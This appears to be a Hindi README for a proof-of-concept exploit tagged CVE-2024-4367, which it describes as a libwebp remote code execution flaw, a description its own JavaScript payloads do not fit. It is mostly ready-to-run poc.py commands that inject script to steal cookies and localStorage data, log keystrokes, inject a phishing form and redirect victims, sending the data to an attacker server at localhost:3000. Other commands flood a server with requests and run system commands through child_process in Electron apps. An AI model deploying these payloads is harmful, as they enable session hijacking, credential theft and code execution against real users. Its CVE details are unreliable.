
CVE-2024-4367 का PoC (Proof of Concept) - libwebp में RCE भेद्यता। पूर्ण प्रदर्शन जिसमें शामिल है: पेलोड निर्माण, हमले के परिदृश्य, जोखिम विश्लेषण और परीक्षण Express.js सर्वर।
शोषण का एक और उदाहरण यह जाँचने के लिए एक साधारण अलर्ट संदेश इंजेक्ट करना है कि हमला काम करता है या नहीं।
python poc.py "alert('XSS exploit triggered');"
XSS हमले का उपयोग पीड़ित के कुकीज़ चुराने और उन्हें एक दुर्भावनापूर्ण सर्वर पर भेजने के लिए किया जा सकता है।
python poc.py "fetch('http://localhost:3000/cookie', {method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify({cookie: document.cookie})});"
http://localhost:3000/cookie) पर भेज दिया जाता है।हमलावर पीड़ित के localStorage में संग्रहीत संवेदनशील जानकारी, जैसे प्रमाणीकरण डेटा या सत्र जानकारी, चुरा सकता है।
python poc.py "fetch('http://localhost:3000/localstorage', { method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify({localstorage: JSON.stringify(localStorage)})});"
localStorage में संग्रहीत संवेदनशील डेटा को पुनर्प्राप्त करता है और उसे fetch अनुरोध के माध्यम से एक दुर्भावनापूर्ण सर्वर पर भेजता है।हमलावर अतिरिक्त जानकारी प्राप्त करने या कोई अन्य एक्सप्लॉइट लोड करने के लिए पीड़ित को एक दुर्भावनापूर्ण साइट पर पुनर्निर्देशित कर सकता है।
python poc.py "window.location.href='http://localhost:3000';"
एक अन्य प्रकार का हमला सर्वर को अनुरोधों से भर देना है, जिससे प्रदर्शन में गिरावट या सेवा में रुकावट आ सकती है।
python poc.py "for (let i = 0; i < 100; i++) { fetch('http://localhost:3000/api'); }"
हमलावर पीड़ित के कीबोर्ड स्ट्रोक को इंटरसेप्ट कर सकता है, जिससे वह पासवर्ड या पहचान जैसी संवेदनशील जानकारी प्राप्त कर सकता है।
python poc.py """document.addEventListener('keydown', function(e) {
fetch('http://localhost:3000/keylogger?key=' + e.key);
});"""
एक हमलावर XSS का उपयोग किसी वेब पृष्ठ में फ़िशिंग फ़ॉर्म इंजेक्ट करने और इस प्रकार संवेदनशील जानकारी (जैसे: पासवर्ड, उपयोगकर्ता नाम) चुराने के लिए कर सकता है।
python poc.py """
var form = document.createElement('form');
form.method = 'POST';
form.action = 'http://localhost:3000/phishing';
var input = document.createElement('input');
input.type = 'text';
input.name = 'username';
form.appendChild(input);
document.body.appendChild(form);
form.submit();
"""
यदि उपयोगकर्ता किसी डाउनलोड बटन पर क्लिक करने वाला है, तो हम डाउनलोड के लक्ष्य को बदल देंगे।
const a = document.createElement('a');
a.href = "https://example.com/fichier.pdf";
a.download = "fichier.pdf";
document.body.appendChild(a);
a.click();
document.body.removeChild(a);
python poc.py "require('child_process').exec('calc.exe')"
Electron या NW.js जैसे फ्रेमवर्क पर आधारित अनुप्रयोग भी XSS हमलों से प्रभावित हो सकते हैं, क्योंकि वे व्यापक स्थानीय पहुंच के साथ डेस्कटॉप अनुप्रयोगों में वेब सामग्री को एकीकृत करने की अनुमति देते हैं।
अपनी अनुमतियों के कारण, ये अनुप्रयोग हमलावर को स्थानीय फ़ाइलों तक पहुंचने, बाहरी प्रक्रियाओं को निष्पादित करने, या लक्ष्य मशीन पर अन्य अनुप्रयोगों (जैसे, कैलकुलेटर, टेक्स्ट एडिटर, आदि) को लॉन्च करने की भी अनुमति दे सकते हैं। यह हमले की सतह को काफी बढ़ा देता है, क्योंकि ये अनुप्रयोग वेब की शक्ति को व्यापक सिस्टम पहुंच के साथ जोड़ते हैं।
CVE (Common Vulnerabilities and Exposures) का शोषण करने वाले हमले विभिन्न प्रकार के XSS हमलों को अंजाम दे सकते हैं। वेब या डेस्कटॉप अनुप्रयोगों में विशिष्ट कमजोरियों का शोषण करके, एक हमलावर दुर्भावनापूर्ण कोड इंजेक्ट कर सकता है, संवेदनशील जानकारी चुरा सकता है, उपयोगकर्ता सत्रों में हेरफेर कर सकता है, या लक्ष्य सिस्टम पर दुर्भावनापूर्ण कार्य कर सकता है।